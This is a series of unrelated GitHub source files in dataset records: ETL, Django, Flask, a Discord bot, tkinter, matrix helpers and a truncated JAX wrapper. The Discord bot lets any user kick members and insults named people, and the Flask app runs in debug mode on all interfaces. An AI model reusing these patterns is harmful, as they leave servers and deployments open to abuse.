== 4] # long\nlosers = ret_12[ret_12.quintile == 0] # short\n\n# check our monthly returns\nwinnerret = mtl_ret.loc[formation + relativedelta(months=1), df.columns.isin(winner.Symbols)]\n\n\n","repo_name":"finch1/Py-Trading","sub_path":"Momentum Strategy.py","file_name":"Momentum Strategy.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"41535906150","text":"from pathlib import Path\nimport pandas as pd\nfrom prefect import flow, task\nfrom hdfs3 import HDFileSystem\n\n@task(retries=3)\ndef fetch(dataset_url: str) -> pd.DataFrame:\n \"\"\"Read taxi data from web to pandas dataframe\"\"\"\n\n return pd.read_parquet(dataset_url)\n\n\n@task()\ndef write_local(df: pd.DataFrame, color: str, dataset_file: str) -> Path:\n \"\"\"write dataframe out locally as parquet file\"\"\"\n path = Path(f\"../data/{color}/{dataset_file}.parquet\")\n df.to_parquet(path, compression=\"gzip\")\n return path\n\n\n@task(log_prints=True)\ndef clean(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Fix dtype issues\"\"\"\n df['tpep_pickup_datetime'] = pd.to_datetime(df['tpep_pickup_datetime'])\n # df['tpep_pickup_dropoff'] = pd.to_datetime(df['tpep_pickup_dropoff'])\n print(df.head(2))\n print(f\"columns: {df.dtypes}\")\n print(f\"rows: {len(df)}\")\n return df\n\n@task(log_prints=True)\ndef write_hdfs(path: Path) -> None:\n '''write file into HDFS container'''\n\n namenode_host='localhost'\n port=8020\n\n # Connect with HaDoop File System\n print('Connecting to HDFS...')\n hdfs = HDFileSystem(namenode_host, port)\n print('Done...')\n\n #Create dir\n dir = '/phong_huynh/'\n if not hdfs.exists(dir):\n print(f\"Directory {dir} doesn't exists! Create {dir}\")\n hdfs.mkdir(dir)\n print('Done...')\n\n local_path = path\n target = str(local_path).split('/')[-1]\n\n # Pusing file into HDFS\n try:\n print(f'HDFS: Start pusing file')\n hdfs.put(local_path, f'{dir}{target}')\n print(f'HDFS: Done pushing {path} into {dir}')\n except Exception as e:\n print(f\"Error: {e}\")\n\n\n@flow()\ndef etl_to_hdfs() -> None:\n \"\"\"The main etl function\"\"\"\n color = \"yellow\"\n year = 2021\n month = 1\n dataset_file = f\"{color}_tripdata_{year}-{month:02}\"\n dataset_url=f\"https://d37ci6vzurychx.cloudfront.net/trip-data/{dataset_file}.parquet\"\n\n print(dataset_url)\n df = fetch(dataset_url)\n df_clean = clean(df)\n path = write_local(df_clean, color, dataset_file)\n write_hdfs(path)\n \n\nif __name__ == \"__main__\":\n etl_to_hdfs()\n","repo_name":"PhongHuynh0394/de-zoomcamp-learning","sub_path":"week_2/hdfs/etl_to_hdfs.py","file_name":"etl_to_hdfs.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"29851406952","text":"#!/usr/bin/python3\n'''\n Define class FileStorage\n'''\nimport json\nimport models\n\n\nclass FileStorage:\n '''\n Serializes instances to JSON file and deserializes to JSON file.\n '''\n __file_path = \"file.json\"\n __objects = {}\n\n def all(self, cls=None):\n '''\n Return the dictionary\n '''\n new_dict = {}\n if cls is None:\n return self.__objects\n\n if cls != \"\":\n for k, v in self.__objects.items():\n if cls == k.split(\".\")[0]:\n new_dict[k] = v\n return new_dict\n else:\n return self.__objects\n\n def new(self, obj):\n '''\n Set in __objects the obj with key .id\n Aguments:\n obj : An instance object.\n '''\n key = str(obj.__class__.__name__) + \".\" + str(obj.id)\n value_dict = obj\n FileStorage.__objects[key] = value_dict\n\n def save(self):\n '''\n Serializes __objects attribute to JSON file.\n '''\n objects_dict = {}\n for key, val in FileStorage.__objects.items():\n objects_dict[key] = val.to_dict()\n\n with open(FileStorage.__file_path, mode='w', encoding=\"UTF8\") as fd:\n json.dump(objects_dict, fd)\n\n def reload(self):\n '''\n Deserializes the JSON file to __objects.\n '''\n try:\n with open(FileStorage.__file_path, encoding=\"UTF8\") as fd:\n FileStorage.__objects = json.load(fd)\n for key, val in FileStorage.__objects.items():\n class_name = val[\"__class__\"]\n class_name = models.classes[class_name]\n FileStorage.__objects[key] = class_name(**val)\n except FileNotFoundError:\n pass\n\n def delete(self, obj=None):\n '''\n Deletes an obj\n '''\n if obj is not None:\n key = str(obj.__class__.__name__) + \".\" + str(obj.id)\n FileStorage.__objects.pop(key, None)\n self.save()\n\n def close(self):\n '''\n Deserialize JSON file to objects\n '''\n self.reload()\n\n def get(self, cls, id):\n '''\n A method to retrieve one object\n Args:\n cls: string representing the class name\n id: string representing the object ID\n Returns:\n '''\n temp_dict = {}\n if id is None:\n return None\n if id != \"\":\n for k, v in self.__objects.items():\n if id == k.split(\".\")[1]:\n temp_dict[k] = v\n return temp_dict.get(k)\n else:\n return None\n\n def count(self, cls=None):\n '''\n A method to count the number of objects in storage\n Args:\n cls: string representing the class name\n '''\n count = 0\n if cls == \"\":\n return None\n if cls is None:\n for k, v in self.__objects.items():\n count += 1\n return count\n else:\n for k, v in self.__objects.items():\n if cls == k.split(\".\")[0]:\n count += 1\n return count\n","repo_name":"thirdcaptain/AirBnB_clone_v3","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"71349050026","text":"import discord\nfrom discord.ext import commands\nimport os\nimport asyncio\nimport random\n\nbot = commands.Bot(command_prefix=\"instinct!\", description=\"Survival Is Key.\")\n\n@bot.event\nasync def on_ready():\n print(\"REX_101 is now online, and ready to wreck havoc. >:D\")\n\n \n \n\n@bot.command()\nasync def introduction(ctx):\n await ctx.send(\"RAWR! BEEP-BOOP-BEEP-BOOP. Hello there human! I am REX_101! The security and interigations bot for this server! :sunglasses:\")\n await ctx.send(\"I hope we can get along nicely :smiley:\")\n await ctx.send(\":thinking: **What am I?** I am the bot from the sole-purpose of the Roblox gaming company Instinct Survivial™!\")\n await ctx.send(\":scream: **Can I be in your server?** No, not at the moment, Uncle Endy says I am in Early-stage development, which means...\")\n await ctx.send(\":warning: **COMPUTING...** \")\n await ctx.send(\"Nope! Not just yet c;\")\n await ctx.send(\"Well I hope that has answered some of your non-dino brain questions! If you require further assitónce with my commands, a list of them, or further FAQ's, run \\\"instinct!help\\\":sparkles: :tada:\")\n await ctx.send(\"Most importantly, always remember: **Survival is key.** :grinning:\")\n \n@bot.command()\nasync def say(ctx, *, something):\n await ctx.send(something)\n \n@bot.command()\nasync def kick(ctx, member: discord.Member):\n await member.kick()\n await ctx.send(\"**User was successfully kicked!** :white_check_mark:\")\n \n# ----------------------------------------------------------------------------------------\n \n@bot.group(invoke_without_subcommand=True)\nasync def idiot(ctx):\n await ctx.send(\"**Invalid Syntax :x::** Please @MENTION the user to use this command.\")\n\n@idiot.command(name=\"AdamHartford\")\nasync def idiot_AdamHartford(ctx):\n await ctx.send(\"@AdamHartford#8272 You are an idiot! :D \")\n\n@idiot.command(name=\"aussiepopcorn\")\nasync def idiot_aussiepopcorn(ctx):\n await ctx.send(\"@aussiepopcorn#3943 You are an idiot! :D\")\n \n@idiot.command(name=\"Enderxcthz\")\nasync def idiot_Enderxcthz(ctx):\n await ctx.send(\"Yo shut up idiot, tryna call my man, the myth, the legend Enderxcthz an \\\"idiot\\\"? Get the hell outta here :clap:\")\n \n\nbot.run(os.environ['TOKEN'])\n","repo_name":"K4K4SH11/REX101","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"10064278112","text":"from collections import OrderedDict\nfrom django import forms\nfrom dal_select2.widgets import ModelSelect2Multiple\nfrom panels.models import Level4Title\nfrom panels.models import GenePanel\nfrom panels.models import GenePanelSnapshot\nfrom panels.models import PanelType\n\n\nclass PanelForm(forms.ModelForm):\n level2 = forms.CharField(required=False)\n level3 = forms.CharField(required=False)\n level4 = forms.CharField()\n description = forms.CharField(widget=forms.Textarea)\n omim = forms.CharField(required=False)\n orphanet = forms.CharField(required=False)\n hpo = forms.CharField(required=False)\n status = forms.ChoiceField(\n required=True, choices=GenePanel.STATUS, initial=GenePanel.STATUS.internal\n )\n\n child_panels = forms.ModelMultipleChoiceField(\n label=\"Child Panels\",\n required=False,\n queryset=GenePanelSnapshot.objects.get_active_annotated().exclude(\n is_super_panel=True\n ),\n widget=ModelSelect2Multiple(\n url=\"autocomplete-simple-panels\", attrs={\"data-minimum-input-length\": 3}\n ),\n )\n\n types = forms.ModelMultipleChoiceField(\n label=\"Panel Types\",\n required=False,\n queryset=PanelType.objects.all(),\n widget=ModelSelect2Multiple(\n url=\"autocomplete-simple-panel-types\",\n attrs={\"data-minimum-input-length\": 1},\n ),\n )\n\n class Meta:\n model = GenePanelSnapshot\n fields = (\"old_panels\",)\n\n def __init__(self, *args, **kwargs):\n gel_curator = kwargs.pop(\"gel_curator\")\n self.request = kwargs.pop(\"request\")\n\n super().__init__(*args, **kwargs)\n\n original_fields = self.fields\n\n self.fields = OrderedDict()\n self.fields[\"level2\"] = original_fields.get(\"level2\")\n self.fields[\"level3\"] = original_fields.get(\"level3\")\n self.fields[\"level4\"] = original_fields.get(\"level4\")\n self.fields[\"description\"] = original_fields.get(\"description\")\n self.fields[\"omim\"] = original_fields.get(\"omim\")\n self.fields[\"orphanet\"] = original_fields.get(\"orphanet\")\n self.fields[\"hpo\"] = original_fields.get(\"hpo\")\n self.fields[\"old_panels\"] = original_fields.get(\"old_panels\")\n self.fields[\"types\"] = original_fields.get(\"types\")\n if gel_curator: # TODO (Oleg) also check if we have entities in this panel\n self.fields[\"child_panels\"] = original_fields.get(\"child_panels\")\n self.fields[\"status\"] = original_fields.get(\"status\")\n\n if self.instance.pk:\n self.fields[\"status\"].initial = self.instance.panel.status\n if gel_curator:\n self.fields[\n \"child_panels\"\n ].initial = self.instance.child_panels.values_list(\"pk\", flat=True)\n self.fields[\"types\"].initial = self.instance.panel.types.values_list(\n \"pk\", flat=True\n )\n\n def clean_level4(self):\n if (\n not self.instance.pk\n or self.cleaned_data[\"level4\"] != self.instance.level4title.name\n ):\n if (\n GenePanelSnapshot.objects.get_active(all=True, internal=True)\n .exclude(panel__status=GenePanel.STATUS.deleted)\n .filter(level4title__name=self.cleaned_data[\"level4\"])\n .exists()\n ):\n raise forms.ValidationError(\"Panel with this name already exists\")\n\n return self.cleaned_data[\"level4\"]\n\n def clean_omim(self):\n return self._clean_array(self.cleaned_data[\"omim\"])\n\n def clean_orphanet(self):\n return self._clean_array(self.cleaned_data[\"orphanet\"])\n\n def clean_hpo(self):\n return self._clean_array(self.cleaned_data[\"hpo\"])\n\n def save(self, *args, **kwargs):\n new_level4 = Level4Title(\n level2title=self.cleaned_data[\"level2\"].strip(),\n level3title=self.cleaned_data[\"level3\"].strip(),\n name=self.cleaned_data[\"level4\"].strip(),\n description=self.cleaned_data[\"description\"].strip(),\n omim=self.cleaned_data[\"omim\"],\n hpo=self.cleaned_data[\"hpo\"],\n orphanet=self.cleaned_data[\"orphanet\"],\n )\n\n activities = []\n\n if self.instance.id:\n current_instance = GenePanelSnapshot.objects.get(pk=self.instance.id)\n\n panel = self.instance.panel\n level4title = self.instance.level4title\n\n data_changed = False\n if level4title.dict_tr() != new_level4.dict_tr():\n data_changed = True\n new_level4.save()\n if level4title.name != new_level4.name:\n activities.append(\n \"Panel name changed from {} to {}\".format(\n level4title.name, new_level4.name\n )\n )\n\n if level4title.hpo != new_level4.hpo:\n activities.append(\n \"HPO terms changed from {} to {}\".format(\n \", \".join(level4title.hpo), \", \".join(new_level4.hpo)\n )\n )\n\n self.instance.level4title = new_level4\n self.instance.panel.name = new_level4.name\n\n if \"old_panels\" in self.changed_data:\n activities.append(\n \"List of related panels changed from {} to {}\".format(\n \"; \".join(current_instance.old_panels),\n \"; \".join(self.cleaned_data[\"old_panels\"]),\n )\n )\n self.instance.old_panels = self.cleaned_data[\"old_panels\"]\n\n if \"status\" in self.changed_data:\n activities.append(\n \"Panel status changed from {} to {}\".format(\n current_instance.panel.status, self.cleaned_data[\"status\"]\n )\n )\n self.instance.panel.status = self.cleaned_data[\"status\"]\n\n update_stats_superpanel = True\n if \"child_panels\" in self.changed_data:\n self.instance.child_panels.set(self.cleaned_data[\"child_panels\"])\n activities.append(\n \"Changed child panels to: {}\".format(\n \"; \".join(\n self.instance.child_panels.values_list(\n \"panel__name\", flat=True\n )\n )\n )\n )\n update_stats_superpanel = False\n\n if \"types\" in self.changed_data:\n panel.types.set(self.cleaned_data[\"types\"])\n activities.append(\n \"Panel types changed to {}\".format(\n \"; \".join(panel.types.values_list(\"name\", flat=True))\n )\n )\n\n if data_changed or self.changed_data:\n self.instance.increment_version()\n panel.save()\n self.instance._update_saved_stats(use_db=update_stats_superpanel)\n else:\n panel.save()\n\n else:\n panel = GenePanel.objects.create(\n name=self.cleaned_data[\"level4\"].strip(),\n status=self.cleaned_data[\"status\"],\n )\n new_level4.save()\n\n activities.append(\"Added Panel {}\".format(panel.name))\n if self.cleaned_data[\"old_panels\"]:\n activities.append(\n \"Set list of related panels to {}\".format(\n \"; \".join(self.cleaned_data[\"old_panels\"])\n )\n )\n\n self.instance.panel = panel\n self.instance.level4title = new_level4\n self.instance.old_panels = self.cleaned_data[\"old_panels\"]\n self.instance.save()\n if self.cleaned_data.get(\"child_panels\"):\n self.instance.child_panels.set(self.cleaned_data[\"child_panels\"])\n self.instance.major_version = max(\n self.instance.child_panels.values_list(\"major_version\", flat=True)\n )\n self.instance.save(update_fields=[\"major_version\"])\n self.instance._update_saved_stats(use_db=False)\n activities.append(\n \"Set child panels to: {}\".format(\n \"; \".join(\n list(\n self.instance.child_panels.values_list(\n \"panel__name\", flat=True\n )\n )\n )\n )\n )\n if self.cleaned_data.get(\"types\"):\n panel.types.set(self.cleaned_data[\"types\"])\n activities.append(\n \"Set panel types to: {}\".format(\n \"; \".join(panel.types.values_list(\"name\", flat=True))\n )\n )\n\n if activities:\n panel.add_activity(self.request.user, \"\\n\".join(activities))\n\n @staticmethod\n def _clean_array(data, separator=\",\"):\n return [x.strip() for x in data.split(separator) if x.strip()]\n","repo_name":"genomicsengland/panelapp","sub_path":"panelapp/panels/forms/panel.py","file_name":"panel.py","file_ext":"py","file_size_in_byte":9326,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"}
+{"seq_id":"36610556503","text":"import json\nimport tkinter as tk\nfrom PIL import Image, ImageTk\nfrom src.dict.res_dict import resolution_dictionary\nfrom vendor.rp import resource_path\n\n\nclass Notation:\n def __init__(self, root):\n \"\"\"\n Notation screen object\n :param root: tkinter window object\n \"\"\"\n with open(resource_path('profile/account.json')) as statistics:\n self.stats = json.loads(statistics.read())\n\n with open(resource_path('settings/settings.json')) as settings:\n self.data = json.loads(settings.read())\n\n self.root = root\n\n height = resolution_dictionary[self.data[\"resolution\"]][1]\n self.coefficient = height/540\n\n exercises = Image.open(resource_path(\"img/text/notationtraining.png\"))\n exercises = exercises.resize((round(450 * self.coefficient), round(103 * self.coefficient)))\n exercisesphoto = ImageTk.PhotoImage(exercises)\n\n GLabel_771 = tk.Label(self.root)\n GLabel_771[\"fg\"] = \"#333333\"\n GLabel_771[\"justify\"] = \"center\"\n GLabel_771[\"image\"] = exercisesphoto\n GLabel_771.place(x=round(255 * self.coefficient), y=round(30 * self.coefficient), width=round(450 * self.coefficient), height=round(103 * self.coefficient))\n\n note = Image.open(resource_path(\"img/text/note.png\"))\n note = note.resize((round(300 * self.coefficient), round(100 * self.coefficient)))\n notephoto = ImageTk.PhotoImage(note)\n\n GButton_181 = tk.Button(self.root)\n GButton_181['bd'] = 0\n GButton_181[\"bg\"] = \"#f0f0f0\"\n GButton_181[\"fg\"] = \"#000000\"\n GButton_181[\"justify\"] = \"center\"\n GButton_181[\"image\"] = notephoto\n GButton_181.place(x=round(140 * self.coefficient), y=round(200 * self.coefficient), width=round(300 * self.coefficient), height=round(100 * self.coefficient))\n GButton_181[\"command\"] = self.GButton_181_command\n\n interval = Image.open(resource_path(\"img/text/interval.png\"))\n interval = interval.resize((round(300 * self.coefficient), round(100 * self.coefficient)))\n intervalphoto = ImageTk.PhotoImage(interval)\n\n GButton_257 = tk.Button(self.root)\n GButton_257['bd'] = 0\n GButton_257[\"bg\"] = \"#f0f0f0\"\n GButton_257[\"fg\"] = \"#000000\"\n GButton_257[\"justify\"] = \"center\"\n GButton_257[\"image\"] = intervalphoto\n GButton_257.place(x=round(520 * self.coefficient), y=round(200 * self.coefficient), width=round(300 * self.coefficient), height=round(100 * self.coefficient))\n GButton_257[\"command\"] = self.GButton_257_command\n\n keysignature = Image.open(resource_path(\"img/text/keysignature.png\"))\n keysignature = keysignature.resize((round(300 * self.coefficient), round(100 * self.coefficient)))\n keysignaturephoto = ImageTk.PhotoImage(keysignature)\n\n GButton_348 = tk.Button(self.root)\n GButton_348['bd'] = 0\n GButton_348[\"bg\"] = \"#f0f0f0\"\n GButton_348[\"fg\"] = \"#000000\"\n GButton_348[\"justify\"] = \"center\"\n GButton_348[\"image\"] = keysignaturephoto\n GButton_348.place(x=round(140 * self.coefficient), y=round(380 * self.coefficient), width=round(300 * self.coefficient), height=round(100 * self.coefficient))\n GButton_348[\"command\"] = self.GButton_348_command\n\n chord = Image.open(resource_path(\"img/text/chord.png\"))\n chord = chord.resize((round(300 * self.coefficient), round(100 * self.coefficient)))\n chordphoto = ImageTk.PhotoImage(chord)\n\n GButton_987 = tk.Button(self.root)\n GButton_987['bd'] = 0\n GButton_987[\"bg\"] = \"#f0f0f0\"\n GButton_987[\"fg\"] = \"#000000\"\n GButton_987[\"justify\"] = \"center\"\n GButton_987[\"image\"] = chordphoto\n GButton_987.place(x=round(520 * self.coefficient), y=round(380 * self.coefficient), width=round(300 * self.coefficient), height=round(100 * self.coefficient))\n GButton_987[\"command\"] = self.GButton_987_command\n\n arrow = Image.open(resource_path(\"img/back_arrow.png\"))\n arrow = arrow.resize((round(122 * self.coefficient), round(122 * self.coefficient)))\n arrowphoto = ImageTk.PhotoImage(arrow)\n\n GButton_172 = tk.Button(self.root)\n GButton_172[\"bd\"] = 0\n GButton_172[\"fg\"] = \"#000000\"\n GButton_172[\"justify\"] = \"center\"\n GButton_172[\"image\"] = arrowphoto\n GButton_172.place(x=round(30 * self.coefficient), y=round(5 * self.coefficient), width=round(122 * self.coefficient), height=round(122 * self.coefficient))\n GButton_172[\"command\"] = self.GButton_172_command\n self.root.mainloop()\n\n def GButton_172_command(self):\n \"\"\"\n Switch to Selection screen\n \"\"\"\n for widget in self.root.winfo_children():\n widget.destroy()\n from src.selection import Selection\n s = Selection(self.root)\n\n def GButton_181_command(self):\n \"\"\"\n Switch to Note screen\n \"\"\"\n for widget in self.root.winfo_children():\n widget.destroy()\n from src.notation_exercises.note import Note\n n = Note(self.root)\n\n def GButton_257_command(self):\n for widget in self.root.winfo_children():\n widget.destroy()\n from src.notation_exercises.interval import Interval\n i = Interval(self.root)\n\n def GButton_348_command(self):\n \"\"\"\n Switch to Key signature screen\n \"\"\"\n for widget in self.root.winfo_children():\n widget.destroy()\n from src.notation_exercises.key_signature import Key_signature\n k = Key_signature(self.root)\n\n def GButton_987_command(self):\n \"\"\"\n Switch to Chord screen\n \"\"\"\n for widget in self.root.winfo_children():\n widget.destroy()\n from src.notation_exercises.chords import Chord\n c = Chord(self.root)\n","repo_name":"vitoandolini99/theorite","sub_path":"src/notation.py","file_name":"notation.py","file_ext":"py","file_size_in_byte":5869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"42548890213","text":"from flask import Flask, render_template, request, redirect, url_for\napp = Flask(__name__)\n\nfrom tinydb import TinyDB, Query\ndb = TinyDB(\"db.json\")\nquery = Query()\n\n#募集アイデアを入れるリスト\nthreads=[]\ni = 0\n\n@app.route(\"/\")\ndef index():\n return render_template('index.html', posts=db.all(), n=len(db), i=i)\n\n# jsonファイルに募集内容を追加\n@app.route(\"/add\")\ndef add_idea():\n data = {\n \"title\":request.args.get(\"title\"),\n \"contents\":request.args.get(\"contents\"),\n \"timespan\":request.args.get(\"timespan\"),\n \"occupation\":request.args.get(\"occupation\"),\n \"region\":request.args.get(\"region\"),\n \"like\": 0\n }\n if not db.search(query.idea==data):\n db.insert({\n \"idea\": data\n })\n return index()\n\n@app.route(\"/reply\")\ndef add_reply():\n db.update({\"reply\":request.args.get(\"reply\")})\n return index()\n\n\n# jsonファイル内のデータを消去する\n@app.route(\"/reset\")\ndef reset():\n if db is not None:\n db.purge()\n i = 0\n return render_template(\"index.html\", posts=db.all(), n=len(db))\n\n\nif __name__==\"__main__\":\n app.run(debug=True, port=5000, host=\"0.0.0.0\")\n","repo_name":"MaikoKamada/TeamE","sub_path":"最終発表/final_submit/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"6722257021","text":"def affine(x, W, b):\n # W * x +b -> output\n y = inner(x, W)\n y = plus (y, b)\n return y\n\ndef inner(y,x):\n # x・y -> output\n n = len(x)\n m = len(y)\n l = len(y[0])\n if len(x[0]) != m:\n print(\"Error: inner size\")\n exit\n else:\n #xのサイズが n*m になっていると想定\n #yのサイズは m*l\n z = [[0 for _ in range(l)] for _ in range(n)]\n #アクセス順を意識して高速化\n for i in range(n):\n for j in range(m):\n for k in range(l):\n z[i][k] += x[i][j]* y[j][k]\n return z\n\ndef plus(x,y):\n rowx = len(x)\n rowy = len(y)\n colx = len(x[0])\n coly = len(y[0])\n if rowx != rowy:\n print(\"Error: not match matrix row\")\n elif colx != coly:\n print(\"Error: not match matrix column\")\n else:\n for i in range(rowx):\n for j in range(colx):\n x[i][j] += y[i][j]\n \n return x\n\nif __name__ == \"__main__\":\n import numpy as np\n a = [[(i+1)*(j+1) for i in range(5)] for j in range(3)]\n W = [[i*2 for i in range(3)] for j in range(4) ]\n b = [[3-i for i in range(5)] for j in range(4)]\n print(a,W)\n print(b)\n y = affine(a,W,b)\n nx = np.array(a)\n nW = np.array(W)\n nb = np.array(b)\n ny = np.dot(nW, nx) + b\n print(ny == y)","repo_name":"shell720/My_Project","sub_path":"machine_learning/AutoEncoder/AutoEncoder/affine.py","file_name":"affine.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"37253197660","text":"from django.urls import path\n\nfrom recipes.web import views\nfrom recipes.web.views import show_index, edit_recipe, delete_recipe, recipe_details, RecipeCreateView\n\nurlpatterns = (\n path('', show_index, name='show index'),\n path('create/', views.RecipeCreateView.as_view(), name='create recipe'),\n path('edit/', edit_recipe, name='edit recipe'),\n path('delete/', delete_recipe, name='delete recipe'),\n path('details/', recipe_details, name='details'),\n\n\n)","repo_name":"SilviyaKolchakova/Recipes","sub_path":"recipes/recipes/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"32464682773","text":"\nfrom jax.tree_util import tree_flatten, tree_map, tree_reduce\nfrom . import structure_util_core as su\nimport jax\nimport inspect\nfrom functools import wraps\n\nfrom jax.core import valid_jaxtype\n\nfrom typing import (Any, Callable, Generator, Hashable, Iterable, List, Literal,\n NamedTuple, Optional, Sequence, Tuple, TypeVar, Union,\n overload, cast)\n\n_CACHED_WRAPS = {}\n\n\nclass HashableTree:\n def __init__(self, tree):\n self.tree = tree\n # we save the current hash of the tree here, so that future in-place changes to the tree\n # which might change the hash cannot fool us...\n self.hash = self.hash_tree()\n \n def hash_tree(self):\n leaves, treedef = tree_flatten(self.tree)\n leaves = tuple(leaves)\n return hash((leaves, treedef))\n\n def __hash__(self):\n # add 1 to the hash so that nobody sneaky can construct the following tuple\n # to engineer a collision (probably not a big deal, but anyway...)\n return hash((self.hash, self.hash_tree())) + 1\n \n def __eq__(self, other):\n # technically, this equality could return False for trees that are\n # really the same if they started out different and then were\n # modified in place to become the same.\n # However, a false negative will only result in an unecessary recompilation\n # while a false positive will result in reusing an incorrect cached jitted function.\n\n if not isinstance(other, HashableTree):\n return False\n eq = self.hash == other.hash\n if not eq:\n return False\n try:\n eq = tree_reduce(lambda a,b: a and b, tree_map(lambda x,y: x==y, self.tree, other.tree), True)\n except:\n return False\n \n return eq\n\n def __str__(self):\n return f\"HashableTree<{self.tree}>\"\n\n\n# These are a bit hacky...\ndef split_jax_nonjax(tree):\n keep_static = lambda x: not valid_jaxtype(x) and isinstance(x, Hashable)\n jaxtype_tree = tree_map(lambda x: None if keep_static(x) else x, tree)\n nonjaxtype_tree = tree_map(lambda x: x if keep_static(x) else None, tree)\n\n return jaxtype_tree, nonjaxtype_tree\n\ndef merge_jax_nonjax(jax_tree, nonjax_tree):\n def merge(jt, njt):\n if njt == None:\n return jt\n else:\n return njt\n\n return tree_map(merge, jax_tree, nonjax_tree, is_leaf=lambda x: x is None)\n\n\ndef improved_static(wrapper, *outer_args, static_argnums=None , static_argnames=None, **outer_kwargs):\n\n wrapper_signature = inspect.signature(wrapper)\n wrapper_parameters = wrapper_signature.parameters\n wrapper_paramnames = list(wrapper_parameters.keys())\n\n if wrapper not in _CACHED_WRAPS:\n _CACHED_WRAPS[wrapper] = {}\n\n _CACHED_FUNCS = _CACHED_WRAPS[wrapper]\n\n # outer_static_argnums = static_argnums\n # outer_static_argnames = static_argnames\n\n # this decorator actually wraps a decorator (the argument \"wrapper\") itself, so we must return a decorator.\n # this function static_wrapper is what we will return.\n @wraps(wrapper)\n def static_wrapper(fun, *wrapper_args, static_argnums=None , static_argnames=None, static_returns=None, **wrapper_kwargs):\n\n # # Some checks to allow for default arguments specified in a decorator...\n # # this might be overly complicated a feature to have...\n # if outer_static_argnums is not None:\n # assert static_argnums is None, \"ambiguous setting for static_argnums in wrapper {fun}!\"\n # static_argnums = outer_static_argnums\n\n # if outer_static_argnames is not None:\n # assert static_argnames is None, \"ambiguous setting for static_argnames in wrapper {fun}!\"\n # static_argnames = outer_static_argnames\n\n # if len(outer_args) == 0:\n # assert len(wrapper_args) == 0, \"ambiguous args for wrapper {fun}!\"\n # wrapper_args = outer_args\n\n # for k,v in outer_kwargs.items():\n # assert k not in wrapper_kwargs, \"ambiguous kwargs for wrapper {fun}!\"\n # wrapper_kwargs[k] = v\n\n\n # check if static_argnums or static_argnames are specified as position arguments.\n def override_arg(value, name):\n if name in wrapper_paramnames and len(wrapper_args) >= wrapper_paramnames.index(name):\n value = wrapper_args[wrapper_argnames.index(name)]\n\n # canonicalize value as list:\n if isinstance(value, int) or isinstance(value, str):\n value = [value]\n if value is None:\n value = []\n\n return list(value)\n \n static_argnums = override_arg(static_argnums, 'static_argnums')\n static_argnames = override_arg(static_argnames, 'static_argnames')\n static_returns = override_arg(static_returns, 'static_returns')\n\n\n # get information about the function we are going to wrap.\n signature = inspect.signature(fun)\n parameters = signature.parameters\n parameter_list = list(parameters.keys())\n\n # canonicalize static_argnums and static_argnames some more: make them\n # refer to the same set of arguments as much as possible to maximize the\n # number of cache hits later.\n for name in static_argnames:\n num = parameter_list.index(name)\n if num not in static_argnums:\n if parameters[name].kind != parameters[name].KEYWORD_ONLY:\n static_argnums.append(num)\n \n for num in static_argnums:\n name = parameter_list[num]\n if name not in static_argnames:\n if parameters[name].kind != parameters[name].POSITIONAL_ONLY:\n static_argnames.append(name) \n\n # initialize cache for this function.\n if fun not in _CACHED_FUNCS:\n _CACHED_FUNCS[fun] = {}\n\n cached_calls = _CACHED_FUNCS[fun]\n \n # this is the function that we will actually return from this decorator.\n # it first computes all static arguments and checks a cache to see if this\n # function has been called with these static arguments before. If not,\n # then it calles the base wrapper (i.e. jax.jit) on a version of the base function\n # to wrap that has all the static arguments included via lexical capture.\n # Otherwise, it looks up this wrapped function in the cache and calls it.\n # Finally, we process the outputs of the function to add back in non-jaxtype outputs.\n # It is assumed that if the static arguments are the same and the non-static arguments\n # have the same shape, then the non-jaxtype outputs are also the same.\n @wraps(fun)\n def wrapped_fun(*args, **kwargs):\n \n # process the args to extract static arguments and prepare the\n # cache key.\n split_args = []\n structure_tree_args_statics = {}\n structure_tree_kwargs_statics = {}\n\n tree_args_statics = {}\n tree_kwargs_statics = {}\n for argnum, arg in enumerate(args):\n if not su.is_structure_tree(arg):\n jax_tree, nonjax_tree = split_jax_nonjax(arg)\n split_args.append(jax_tree)\n tree_args_statics[argnum] = nonjax_tree\n else:\n params_buffers, rest = su.split_non_static(arg)\n split_args.append(params_buffers)\n structure_tree_args_statics[argnum] = rest \n\n split_kwargs = {}\n for k, v in kwargs.items():\n if not su.is_structure_tree(v):\n jax_tree, nonjax_tree = split_jax_nonjax(v)\n split_kwargs[k] = jax_tree\n tree_kwargs_statics[k] = nonjax_tree\n else:\n params_buffers, rest = su.split_non_static(v)\n split_kwargs[k] = params_buffers\n structure_tree_kwargs_statics[k] = rest \n\n\n static_args = [arg if i in static_argnums else None for i, arg in enumerate(split_args)]\n static_kwargs = {\n k: split_kwargs.get(k) for k in static_argnames\n }\n\n cache_key = HashableTree({\n 'static_argnums': static_argnums,\n 'static_args': static_args,\n 'static_argnames': static_argnames,\n 'static_kwargs': static_kwargs,\n 'structure_tree_args_statics': structure_tree_args_statics,\n 'tree_args_statics': tree_args_statics,\n 'structure_tree_kwargs_statics': structure_tree_kwargs_statics,\n 'tree_kwargs_statics': tree_kwargs_statics,\n 'static_returns': static_returns,\n })\n\n # cache miss - define a function to wrap with the base wrapper.\n if cache_key not in 